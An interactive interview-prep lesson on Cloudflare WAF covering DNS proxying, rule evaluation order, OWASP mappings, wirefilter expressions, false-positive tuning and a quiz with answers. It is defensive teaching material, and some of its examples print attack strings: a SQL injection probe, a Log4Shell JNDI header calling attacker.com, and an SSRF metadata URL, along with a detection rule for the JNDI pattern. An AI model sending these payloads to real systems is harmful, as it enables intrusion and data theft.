TTechclick All lessons
Cloudflare · WAF · Interview Deep-DiveInteractive · SOC L1 / L2 / DevSecOps

Cloudflare WAF — Beginner to Advanced, Interview-Ready in 15 Minutes

Think of Cloudflare WAF as the security bouncer at Mumbai International's Terminal 2 — every packet ID'd, frisked, and profiled before it reaches the boarding gate (your origin server). Skip the bouncer and Mumbai's most chaotic crowd — the open internet — walks straight in. This lesson takes you from "what is a WAF" to "I can write the wirefilter rule on the interview whiteboard" in under 15 minutes.

📅 2026-05-30 · ⏱ 15 min · 2 visualizers + 4 infographics · 🏷 10-Q Bloom assessment + AI Tutor

Learning objectives

Pick a path — jump straight to it

1

DNS & Deploy

Orange-cloud vs grey-cloud. Why "WAF off" really means "DNS not proxied".

 2

7-Phase Order

What runs first, what runs last. THE interview whiteboard question.

 3

OWASP → Rules

Top 10 mapped to CF features + 8 copy-paste wirefilter expressions.

 4

SOC L1 Driver

False-positive tuning, Security Events, Logpush. The workflow no tutorial shows.

① Before the firewall — DNS, orange-cloud, and "WAF off"

Aditya at HCL types flipkart.com. His browser asks DNS, gets back an IP, opens TCP/443. Whether Cloudflare's WAF inspects that packet depends entirely on one toggle in the DNS panel — the orange cloud. Get the toggle wrong and your WAF, rate-limit rules, and DDoS shield are all silently bypassed.

Cloudflare is a reverse proxy running on an anycast network of 330+ cities. When DNS is proxied (orange), the A record returns Cloudflare's edge IPs — packets terminate at the nearest PoP, get WAF + Bot + Cache + SSL applied, then forwarded to your origin via the cf-connecting-ip header. Grey-cloud the same record and DNS returns the raw origin IP — WAF is off, CDN is off, origin IP is leaked.

Orange-cloud vs grey-cloud DNS proxying flow Two parallel paths from browser to origin. Top path is orange-cloud — traffic flows through Cloudflare edge with WAF, Bot, Cache, SSL. Bottom path is grey-cloud — DNS resolves to origin IP directly, no protection. DNS proxying — the one toggle that decides if WAF runs ORANGE CLOUD (PROXIED) GREY CLOUD (DNS ONLY) Browser Aditya at HCL CF DNS returns 104.16.x.x CF EDGE (anycast PoP) ✓ WAF · ✓ Bot · ✓ Rate Limit ✓ DDoS · ✓ Cache · ✓ SSL terminates & inspects Origin 192.0.2.10 (hidden) Browser (or attacker) CF DNS returns 192.0.2.10 ← ⚠ Origin IP EXPOSED — no WAF, no DDoS shield Origin direct hit "WAF off" = no orange cloud on that DNS record. Anyone who finds the origin IP bypasses Cloudflare entirely.
SVG #1 — Two paths, one toggle. The orange cloud is what puts your traffic in front of the WAF.

Deploy a site behind Cloudflare WAF — the 6-step path

The end-to-end deployment for a brand-new domain looks like this — written exactly as you would do it on a real account:

  1. Add site at dash.cloudflare.com → pick Free plan to start. CF scans your existing DNS records.
  2. Update nameservers at your registrar (GoDaddy, Namecheap, BigRock) to the two CF nameservers shown. DNS propagation 5 min – 24 hrs.
  3. SSL/TLS mode → set to Full (strict) — encrypts both legs and validates the origin cert. Never use Flexible in production.
  4. Security → WAF → Managed Rules → enable Cloudflare Free Managed Ruleset. On Pro+ also enable Cloudflare Managed Ruleset and Cloudflare OWASP Core Ruleset.
  5. Custom Rules → start with one rule: block known-bad IPs from cf.threat_score > 14.
  6. Rate Limiting → add a rule on /login or any auth endpoint: 5 requests per 60 seconds per IP, action = block, duration 300s.
🌥
Orange Cloud
tap to flip

DNS record is proxied through Cloudflare. WAF, CDN, Bot Management, DDoS, SSL termination — all active. Default for web traffic.

Grey Cloud
tap to flip

DNS-only. Cloudflare answers DNS but doesn't proxy traffic. Origin IP is returned to the world. Use only for SMTP / SSH where proxying doesn't work.

🌐
Anycast
tap to flip

One IP advertised from 330+ cities. The internet routes Aditya in Mumbai to the Mumbai PoP automatically — DDoS absorbed where it lands.

🔐
Full (strict)
tap to flip

TLS browser↔CF AND CF↔origin, with origin cert validated. The only safe SSL mode for production. "Flexible" mode is HTTP to origin — never use it.

👉 So far: orange cloud = proxied through CF (WAF runs). Grey cloud = origin IP leaks. Next: we open the WAF itself and look at what runs first when that packet arrives.
Quick check · Q1 of 10 · Apply

Sneha at Infosys grey-clouds a subdomain "to allow direct origin access for an internal API". What's actually exposed after that change?

Correct: a. Grey-cloud disables proxying — CF just answers DNS with the raw origin IP. Attackers run dig +short api.company.com and immediately bypass every CF protection. This is the #1 way origin IPs leak. Internal APIs that absolutely need direct access should use Cloudflare Tunnel or Authenticated Origin Pulls instead.

② The 7 phases — what runs first, what runs last

This is THE question every Cloudflare interviewer asks: "Walk me through how a request traverses your WAF." Most candidates name three features and stall. The good candidates draw a swimlane.

When a request hits the CF edge, it goes through phases in a fixed order. L3/L4 DDoS runs at packet level first (before any HTTP parsing). Then HTTP phases run in this order — memorise the bold ones, those are where you actually configure rules:

7-phase WAF evaluation order pipeline Sequential pipeline showing the order of evaluation: L3/L4 DDoS, then HTTP phases DDoS L7, Custom Rules, Rate Limiting, Managed Rules, Super Bot Fight Mode, Transform, finally Origin. Block actions terminate the pipeline. Cloudflare WAF — order of evaluation (top → bottom) L3/L4 DDoS Mitigation packet level — runs first Drops floods before HTTP parses ① ddos_l7 HTTP-layer DDoS engine Auto rules — you can't edit ② Custom Rules http_request_firewall_custom ⚠ Runs BEFORE Managed ③ Rate Limiting http_ratelimit ④ Managed Rules OWASP CRS · CF Managed · Exposed Creds ⑤ Super Bot Fight http_request_sbfm ⑥ Transform / Rewrite header rewrite, redirect ⑦ Cache → Workers → Origin survives — packet reaches your app BLOCK / CHALLENGE any phase can terminate the pipeline → origin never sees the request ⚠ Account-scope rules run BEFORE zone-scope rules within the same phase. A zone-level "skip" cannot undo an account-level "block".
SVG #2 — The phase pipeline. Custom Rules run BEFORE Managed Rules — that's the gotcha every interviewer probes.

▶ Watch a SQLi request traverse all 7 phases

Click Play. The packet is GET /product?id=1' OR '1'='1 from an unknown IP. See where it dies.

① INGRESS 203.0.113.45:51200198.51.100.20:443 · GET /product?id=1' OR '1'='1
② DDOS L7 Request rate from this IP = 12/min · under threshold · passes
③ CUSTOM RULES No matching custom rule (no country block, no IP allowlist hit) · continues
④ RATE LIMIT /product not in rate-limited paths · passes
⑤ MANAGED RULES OWASP CRS rule 942100 fires (SQLi pattern). Anomaly score 5 + Cloudflare Managed rule 100002 = BLOCK
⑥ — — — Pipeline terminated. Bot, Transform, Cache, Origin — none of these run.
⑦ RESPONSE Attacker receives 403 Forbidden · Security Events logs the rule + payload · origin never knew it happened.
Press Play to step through. Stage 5 is where the SQLi dies — see why Custom Rules running earlier matters.
The #1 phase-order trap

If you write a Custom Rule that BLOCKS an IP for "SQLi reasons", the Managed Rules NEVER fire on that IP — so Security Events never log the SQLi rule ID. You lose attack telemetry. Better: in Custom Rules, action = log for visibility, let Managed Rules do the block. Save Custom Rule blocks for clear-cut cases (geo, IP allowlist, known-bad ASN).

Quick check · Q2 of 10 · Analyze

Rahul writes a Custom Rule "block IP 203.0.113.45" AND has the Managed Ruleset enabled. That IP sends a SQLi payload. What appears in Security Events?

Correct: d. Custom Rules sit in the http_request_firewall_custom phase, which is evaluated BEFORE http_request_firewall_managed. A block action terminates the pipeline. Net effect: you lose the SQLi attribution. Switch your Custom Rule action to log if you want to see what Managed Rules would catch on the same IP — or accept the trade-off if the IP is permanently banned.

③ OWASP Top 10 → Cloudflare feature map

The interviewer's whiteboard question: "Pick any 3 OWASP categories — which Cloudflare feature blocks them?" Here's the full map, tight enough to write from memory.

OWASP Top 10 2021 mapped to Cloudflare WAF features A 10-row table mapping each OWASP Top 10 2021 category to the specific Cloudflare WAF mitigation feature, with example attack pattern. OWASP Top 10 (2021) → Cloudflare WAF mapping # Category Cloudflare feature Example payload A01 Broken Access Control Custom Rules + API Shield (Ent) GET /api/user/999 A02 Cryptographic Failures SSL/TLS Full(strict), HSTS, TLS 1.3 HTTP login form A03 Injection (SQLi/XSS/CMDi) OWASP CRS + Managed Ruleset + Attack Score ?id=1' OR '1'='1 A04 Insecure Design — design layer, NOT a WAF problem code review A05 Security Misconfig Managed Ruleset (admin-panel sigs), API Shield GET /server-status A06 Vulnerable Components (CVE) Managed Ruleset per-CVE virtual patch ${'$'}{jndi:ldap://…} A07 Auth Failures Rate Limit /login + Exposed Creds Check + Turnstile brute-force POST A08 Software / Data Integrity Managed Ruleset (deserialisation sigs) PHP unserialize A09 Logging & Monitoring Logpush → SIEM, Security Events dashboard infra layer A10 SSRF Managed Ruleset SSRF sigs + Custom Rule on outbound ?url=169.254.169.254 A04 is the honest answer interviewers love — admit a WAF cannot fix design-layer bugs. That's the senior signal.
SVG #3 — The interview whiteboard, ready-to-redraw. Memorise the 5 features in column 3 (CRS, Managed, Rate Limit, SSL, Logpush).

Wirefilter cheat-sheet — 8 expressions you can paste tomorrow

The wirefilter language is what makes the difference between someone who's read about WAFs and someone who can operate one. Memorise the field names (http.request.uri.path, ip.src.country, cf.client.bot, cf.threat_score) — then everything else is glue.

ScenarioWirefilter expressionAction
Block POST to wp-login from outside India(http.request.uri.path eq "/wp-login.php" and http.request.method eq "POST" and ip.src.country ne "IN")block
Geo-block sanctioned countries(ip.src.country in {"KP" "IR" "SY"})block
Allow verified Googlebot (skip remaining rules)(cf.client.bot and http.user_agent contains "Googlebot")skip → all remaining Custom Rules
Bypass WAF for Stripe webhooks(http.host eq "api.techclick.in" and http.request.uri.path eq "/stripe/webhook" and ip.src in {3.18.12.63 13.235.14.237})skip → all Managed Rulesets
Rate-limit login by IP — 5 req/min(http.request.uri.path eq "/login" and http.request.method eq "POST") · characteristic = ip.src · period 60 · requests 5block · duration 300
Block high CF threat-score (Pro+)(cf.threat_score gt 14)managed_challenge
Virtual patch CVE-2021-44228 (Log4Shell) header(any(http.request.headers.values[*] contains "${'$'}{jndi:"))block
Allow only admin office IP to /wp-admin(http.request.uri.path matches "^/wp-admin" and not ip.src in {49.207.0.0/16})block
The action types you must know

block · challenge (interactive captcha) · js_challenge (silent JS check) · managed_challenge (CF picks the lightest) · skip (skip all/selected remaining rulesets) · log (Enterprise — visibility only, no action). When tuning a noisy rule, START with log for 48 hours, drill into payloads, THEN move to block.

Plan-tier matrix (the "why this customer is on Pro" question)

FeatureFreePro $25/moBusiness $250/moEnterprise
CF Free Managed Ruleset
CF Managed Ruleset + OWASP CRS + Exposed Creds
Custom Rules (count)5201001000+
Rate Limiting Rules1 basic5151000+
Bot protectionBot Fight ModeSuper Bot FightSuper Bot FightBot Management (ML)
Attack Score (cf.waf.score)
Logpush to SIEM
Quick check · Q3 of 10 · Apply

Karthik at Flipkart wants to block POST to /wp-login.php from outside India. Which wirefilter expression is correct?

Correct: b. Wirefilter uses lowercase operators (eq, ne, in, contains, matches) and dotted field paths. http.host is the Host header (not the path), http.request.uri.path is the URL path. Country comparison uses ISO 3166 alpha-2 codes ("IN", "US", "KP"). C-style operators (==, !=) don't work.

④ SOC L1 daily driver — false positives, Security Events, Logpush

The day-2 reality: a marketing manager screams that file uploads are broken, your dashboard shows a spike of WAF blocks on /api/upload. The bad answer is to disable the OWASP ruleset. The interview-correct answer is the 4-step tuning ladder.

False-positive tuning decision tree Decision flow starting from a WAF block alert. First check Security Events for the rule ID and payload. Then decide if it's a real attack or false positive. False positive path leads to creating a scoped WAF Exception with specific URL pattern and rule IDs. Real attack path leads to confirming the block. False-positive triage — the SOC L1 ladder Alert: WAF blocked /api/upload Security Events dashboard Step 1 — Find rule ID + payload Click event → see rule 949110 + raw body Real attack? read the payload NO · false +ve YES · real attack Create WAF Exception Scope: path = /api/upload Exclude: rule 949110 Keep rest of CRS active Confirm block + investigate Tag source IP / ASN Check for repeat patterns Add Custom Rule if needed Re-deploy → verify in Security Events close ticket only after 1hr verification
SVG #4 — The tuning ladder. Never disable a whole ruleset — scope exceptions to path + rule ID.

▶ Log4Shell attack — the WAF rule fires in real time

Attacker sends a User-Agent with the JNDI payload. Watch each phase decide.

① INGRESS GET / HTTP/1.1 · User-Agent: ${'$'}{jndi:ldap://attacker.com/x}
② DDOS L7 Single request, no flood pattern · passes
③ CUSTOM No custom rule matches this header pattern · continues
④ MANAGED Rule 100530 "Log4j RCE - CVE-2021-44228" matches the ${'$'}{jndi: pattern · BLOCK
⑤ RESPONSE Attacker gets 403 · Security Events logs CVE rule + full payload · Logpush ships to Splunk for SIEM correlation.
This is "virtual patching" — your Log4j-vulnerable app at the origin is never reached, even on Day 0 of the CVE.

Logpush — ship WAF events to your SIEM

On Enterprise (or via Logpush API), you can stream every WAF event in real time to SIEM targets — S3, R2, Splunk HEC, Sentinel, Datadog. Sample CLI snippet:

Curl — create a Logpush job to R2 
curl -X POST "https://api.cloudflare.com/client/v4/zones/$ZONE/logpush/jobs" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  --data '{
    "destination_conf": "r2://my-bucket/cf-waf?account-id=$ACCT",
    "dataset": "http_requests",
    "logpull_options": "fields=RayID,ClientIP,ClientCountry,WAFAction,WAFRuleID,WAFProfile×tamps=rfc3339"
  }'
Expected output 
{
  "success": true,
  "result": {
    "id": 12345,
    "dataset": "http_requests",
    "enabled": true,
    "destination_conf": "r2://my-bucket/cf-waf?account-id=..."
  }
}
Top 3 production gotchas (from r/cloudflare)

1. Multipart /api/upload false positive — OWASP CRS rule 949110 trips on legitimate binary uploads. Fix: scoped WAF Exception. 2. Managed Challenge fires on logged-in users mid-session — happens when paranoia is too high; create exception scoped to authenticated cookie. 3. Rate-limit using ip.src alone — behind corporate NAT (Infosys office = one egress IP), one rule punishes 5000 users. Switch the characteristic to ip.src + cookie session ID.

Quick check · Q4 of 10 · Analyze

Priya at TCS sees the OWASP ruleset blocking legitimate multipart uploads to /api/upload. Marketing is escalating. What's the right tuning move?

Correct: c. The whole point of WAF Exceptions is surgical scope — turn off the noisy rule(s) only where they cause FPs, on the specific path, while every other path keeps full protection. Disabling everything is the "throw the laptop out the window" answer interviewers want you to avoid. Lowering global paranoia weakens the entire site to fix one endpoint. Permanent log mode means you've stopped blocking — congratulations, you're not running a WAF anymore.

What WAF does NOT protect — the senior gotcha

Every senior interviewer ends with this: "OK, you've explained what a WAF blocks. Now tell me what it CAN'T block." The honest answer separates L1 from L2:

Defenders for these: SAST/DAST, IAM with row-level policy, code review, dependency scanning, supply-chain attestation. WAF is one layer in defense-in-depth — never the only one.

Cloudflare WAF interview cheat-sheet A single-card visual cheat-sheet with six tiles summarising the most-asked Cloudflare WAF interview points: phase order, wirefilter syntax, OWASP mapping, false-positive tuning, plan tiers, and WAF limits. 🎓 Cloudflare WAF Interview Cheat-Sheet Memorise these 6 tiles the night before ① Phase order L3/L4 DDoS → DDoS L7 → Custom → Rate Limit → Managed → Bot → Transform → Cache → Origin Custom BEFORE Managed → if you block in Custom, Managed never logs ② Wirefilter fields http.request.uri.path ip.src · ip.src.country cf.client.bot · cf.threat_score http.user_agent Operators: eq ne in matches contains ③ OWASP map (top 4) A03 Injection → OWASP CRS A06 CVEs → Managed virtual patch A07 Auth → Rate Limit + Exposed Creds A10 SSRF → CRS SSRF sigs A04 = design — NOT a WAF problem ④ FP tuning ladder 1. Security Events → rule ID + payload 2. Real attack? Y → confirm block 3. N → scoped WAF Exception 4. Re-deploy → verify in dashboard NEVER disable a whole ruleset ⑤ Plan tiers Free: CF Free Ruleset, BFM, 5 custom Pro $25: + Managed + OWASP CRS Business $250: + Attack Score + SBFM Ent: ML Bot Mgmt + Logpush + API Shield "Why this customer is on X?" → know this ⑥ WAF can NOT block Business logic abuse · IDOR Broken auth (stolen tokens) Race conditions · supply chain Bypass: unicode, multipart, ACME path Honest answer = senior signal
SVG #5 — Save this image. Six tiles, the night before your interview, you're set.

🤖 Ask the AI Tutor

Tap any question — instant context-aware answer. No login, no waiting.

Pre-curated answers from Cloudflare docs + community Q&A + 2025/26 attack reports. For deeper / live questions, paste your output into chat.techclick.in.

📝 Final assessment — six more questions

You've answered 4 inline. Six remaining. 70% (7 of 10) total marks the lesson complete on your profile. Tap Submit all answers at the end.

Q5 · Remember

A proxied Cloudflare zone serves HTTPS traffic on which default port?

Correct: a — 443. CF proxied HTTPS terminates at the edge on the standard HTTPS port. CF also supports 2053, 2083, 2087, 2096, 8443 as alternative HTTPS ports on paid plans for non-browser clients, but the default browser-facing port is 443.
Q6 · Apply

Aditya at HCL wants ML-based bot scoring with the cf.bot_management.score field for custom rules. What's the minimum Cloudflare plan that gives him this?

Correct: d — Enterprise. Bot Fight Mode (Free) and Super Bot Fight Mode (Pro/Business) use heuristics + threat intel with fixed toggles. The ML-driven 1–99 bot score, JA3/JA4 fingerprinting, behavioural analysis, mobile SDK, and the wirefilter field cf.bot_management.score are exclusive to Enterprise Bot Management.
Q7 · Analyze

Priya watches the CF dashboard show 8.3M attacks blocked in Q3 2025 (Cloudflare's published stat). Her origin firewall logs show almost nothing inbound from attackers. Why?

Correct: a. Per Cloudflare's Q3 2025 DDoS report, CF autonomously mitigated 8.3M DDoS attacks (avg ~3,780/hour) and a record 29.7 Tbps UDP carpet-bombing attack. All terminated at the edge — none of it reaches origin. The interview lesson: a healthy WAF deployment makes the origin firewall logs LOOK boring. That's the success signal, not a sign things are broken.
Q8 · Analyze

An account-scope WAF rule blocks country = CN globally. A zone-scope rule on api.techclick.in tries to allow CN traffic to /api/partner. A CN request hits /api/partner. What happens?

Correct: b. CF's phase pipeline evaluates account-scope rules BEFORE zone-scope rules within the same phase. The account-level block terminates the request — the zone-level skip is never reached. To allow exceptions, move the geo-block to zone-scope, or add the exception at the account level instead. Hours have been lost debugging this exact misunderstanding.
Q9 · Evaluate

A team proposes migrating from Cloudflare WAF to AWS WAF "because it integrates tighter with our ALB and we can write rules in JSON". What's the architectural trade-off the proposal is glossing over?

Correct: c. The where-it-runs question matters more than the how-rules-are-written question. Edge termination = attacks die at the geographically nearest PoP, before they cross expensive backbone links. AWS WAF only protects after the request reaches an AWS region — a Mumbai user is still hitting eu-west-1 with their SQLi if the ALB is there. AWS WAF wins when you're 100% AWS-native and need tight JSON-as-code rule version control via IaC; CF wins on latency, DDoS-absorption capacity, and multi-cloud portability.
Q10 · Evaluate

Final interview question: "What does a WAF NOT protect against?" Pick the strongest answer that signals senior thinking.

Correct: c. SQLi/XSS are exactly what WAFs are designed to block (a is wrong). CF specifically does handle L3/L4 + L7 DDoS (b is wrong). Bot Management is included in WAF stacks (d is wrong). The correct answer admits the architectural limit — patterns can't catch valid-looking-but-malicious business logic. Saying so out loud, plus naming concrete bypass techniques, is the senior signal interviewers reward.
Lesson complete — saved to your profile.
Almost! You need 70% (7 of 10) — re-read the section that tripped you up and tap "Try again".

📚 Sources

  1. Cloudflare Docs — WAF Managed Rules & plan-tier matrix
  2. Cloudflare Docs — Ruleset Engine phases (the order-of-evaluation source)
  3. Cloudflare Docs — Wirefilter field reference
  4. Cloudflare Docs — WAF Exceptions (FP tuning workflow)
  5. OWASP Top 10 (2021) — official category list
  6. Cloudflare Blog — Q3 2025 DDoS Threat Report (8.3M attacks, 29.7 Tbps record)
  7. Cloudflare Blog — Dec 2025 React RCE virtual patch (CVE-2025-55182, CVSS 10.0)
  8. CF Community — real false-positive thread on /api/upload tuning
  9. WAFFLED (2025) — academic paper on 1,207 parser-discrepancy WAF bypasses
  10. Cloudflare Network — 330+ cities, 100+ countries (anycast footprint)

What's next?

Next we open up Cloudflare Bot Management — JA3/JA4 fingerprinting, the ML bot score, distinguishing Googlebot from Bytespider, and writing a custom rule on cf.bot_management.score. That blog rounds out the L1 SOC / Cloud Security interview toolkit.

All lessons → Practice exam ↗